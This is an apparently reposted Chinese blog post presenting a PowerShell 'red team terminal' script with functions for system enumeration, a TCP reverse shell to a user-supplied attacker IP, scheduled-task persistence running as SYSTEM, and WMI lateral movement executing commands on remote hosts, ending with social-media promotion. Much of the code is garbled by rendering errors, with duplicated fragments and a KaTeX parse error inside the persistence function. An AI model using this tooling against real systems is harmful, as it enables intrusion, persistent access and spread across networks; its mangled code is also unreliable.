红队渗透利器：高级系统枚举、权限提升与持久化终端脚本

redteam_terminal.ps1

作者：Gerard King

描述：一个用于高级系统枚举、权限提升和持久化的一级红队操作员终端程序。

用例：渗透测试人员和红队操作员在 Windows 环境中进行对抗性演练。

标签：PowerShell，红队，渗透测试，枚举，权限提升，持久化

函数：收集详细的系统信息（例如，操作系统、用户、服务）

function Get-SystemInfo {
$os = Get-CimInstance -ClassName Win32_OperatingSystem
$cpu = Get-CimInstance -ClassName Win32_Processor
$services = Get-Service
users=Get−WmiObject−ClassWin32UserAccountWrite−Host"‘n[+]系统信息："Write−Host"操作系统：users = Get-WmiObject -Class Win32_UserAccount Write-Host "`n[+] 系统信息：" Write-Host "操作系统：users=Get−WmiObject−ClassWin32U​serAccountWrite−Host"‘n[+]系统信息："Write−Host"操作系统：(os.Caption)∣版本：os.Caption) | 版本：os.Caption)∣版本：(os.Version)"Write−Host"CPU：os.Version)" Write-Host "CPU：os.Version)"Write−Host"CPU：($cpu.Name)"
Write-Host “n[+] 系统上的用户：" $users | ForEach-Object { Write-Host "用户：$($_.Name) | 域：$($_.Domain)" } Write-Host "n[+] 运行中的服务：”
$services | Select-Object Name, Status | Format-Table
}

函数：使用 Netstat 和 PowerShell 扫描开放的端口和活动服务

function Scan-Network {
Write-Host “`n[+] 网络扫描（开放端口）：”
$netstat = netstat -an | Select-String “LISTENING”
$netstat | ForEach-Object { Write-Host $_.Line }
}

函数：执行权限提升检查（例如，不安全的权限）

function Priv-EscalationCheck {
Write-Host “n[+] 权限提升检查（不安全的权限）：" $vulnerableDirs = @("C:\Program Files", "C:\Windows\System32", "C:\Users\Public") foreach ($dir in $vulnerableDirs) { Write-Host "n检查目录：$dir”
Get-Acl $dir | Select-Object Path, Access
}
}

函数：启动一个反向 Shell 后门

function Start-ReverseShell {
param(
[string]ip,[int]ip, [int]ip,[int]port
)
Write-Host “`n[+] 正在启动反向 Shell 连接到ip:{ip}:ip:{port}”
reverseShell=New−ObjectSystem.Net.Sockets.TcpClient(reverseShell = New-Object System.Net.Sockets.TcpClient(reverseShell=New−ObjectSystem.Net.Sockets.TcpClient(ip, $port)
$stream = $reverseShell.GetStream()
writer=New−ObjectSystem.IO.StreamWriter(writer = New-Object System.IO.StreamWriter(writer=New−ObjectSystem.IO.StreamWriter(stream)
reader=New−ObjectSystem.IO.StreamReader(reader = New-Object System.IO.StreamReader(reader=New−ObjectSystem.IO.StreamReader(stream)
while ($true) {
command=Read−Host"Shell命令"if(command = Read-Host "Shell 命令" if (command=Read−Host"Shell命令"if(command -eq “exit”) {
$writer.WriteLine(“exit”)
$writer.Flush()
break
}
writer.WriteLine(writer.WriteLine(writer.WriteLine(command)
$writer.Flush()
$response = $reader.ReadLine()
Write-Host $response
}
$reader.Close()
$writer.Close()
$reverseShell.Close()
}

函数：创建持久化机制（例如，计划任务）

function Set-Persistence {
Write-Host “`n[+] 正在设置持久化（计划任务）”
$taskName = “RedTeamPersistence”
$taskAction = “powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Your\MaliciousScript.ps1”
$taskTrigger = New-ScheduledTaskTrigger -AtStartup
$taskActionObj = New-ScheduledTaskAction -Execute “powershell.exe” -Argument $taskAction
Register-ScheduledTask -Action $taskActionObj -Trigger $taskTrigger -TaskNameKaTeX parse error: Undefined control sequence: \SYSTEM at position 29: …r "NT AUTHORITY\̲S̲Y̲S̲T̲E̲M̲" Write-Hos…taskName"
}

函数：发起横向移动（例如，远程 WMI 或 SMB 执行）

function Lateral-Movement {
param(
[string]targetIp,[string]targetIp, [string]targetIp,[string]command
)
Write-Host “`n[+] 正在向 ${targetIp} 发起横向移动”
Invoke-WmiMethod -ComputerName $targetIp -Class Win32_Process -Name Create -ArgumentList $command
Write-Host “[+] 命令已在targetIp上执行：{targetIp} 上执行：targetIp上执行：{command}”
}

函数：提示用户交互并执行命令

function Start-RedTeamTerminal {
# Check-AdminPrivileges # 移除了管理员检查
Clear-Host
Write-Host “[+] 欢迎来到红队终端。准备就绪，等待您的命令。”
Write-Host “[+] 输入 ‘exit’ 退出或输入 ‘help’ 查看可用命令。”
while ($true) {
input=Read−Host"输入命令"switch(input = Read-Host "输入命令" switch (input=Read−Host"输入命令"switch(input.ToLower()) {
‘sysinfo’ { Get-SystemInfo }
‘network’ { Scan-Network }
‘priv’ { Priv-EscalationCheck }
‘rev’ {
$ip = Read-Host “输入攻击者的 IP”
$port = Read-Host “输入端口”
Start-ReverseShell -ip $ip -port $port
}
‘persistence’ { Set-Persistence }
‘lateral’ {
$targetIp = Read-Host “输入目标 IP”
$command = Read-Host “输入要执行的命令”
Lateral-Movement -targetIp $targetIp -command $command
}
‘exit’ { Write-Host “[+] 正在退出红队终端。”; break }
‘help’ {
Write-Host “`n[+] 可用命令：”
Write-Host “‘sysinfo’ - 显示系统信息。”
Write-Host “‘network’ - 扫描开放端口。”
Write-Host “‘priv’ - 检查权限提升机会。”
Write-Host “‘rev’ - 启动反向 Shell 后门。”
Write-Host “‘persistence’ - 通过计划任务设置持久化。”
Write-Host “‘lateral’ - 通过横向移动远程执行命令。”
Write-Host “‘exit’ - 退出终端。”
}
default { Write-Host “[+] 无效命令。输入 ‘help’ 查看可用命令。” }
}
}
}

启动红队终端

Start-RedTeamTerminal

在关闭窗口前暂停

Read-Host “按 Enter 键退出…”
CSD0tFqvECLokhw9aBeRqgzMWoT3AX/+bU4PBIwC6DhNeFb6uWAb2K1DkZza2joRR6xAJk81iZpBY/YhfptuIexMIqBLL1Tek1O1ZgDACjo=
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）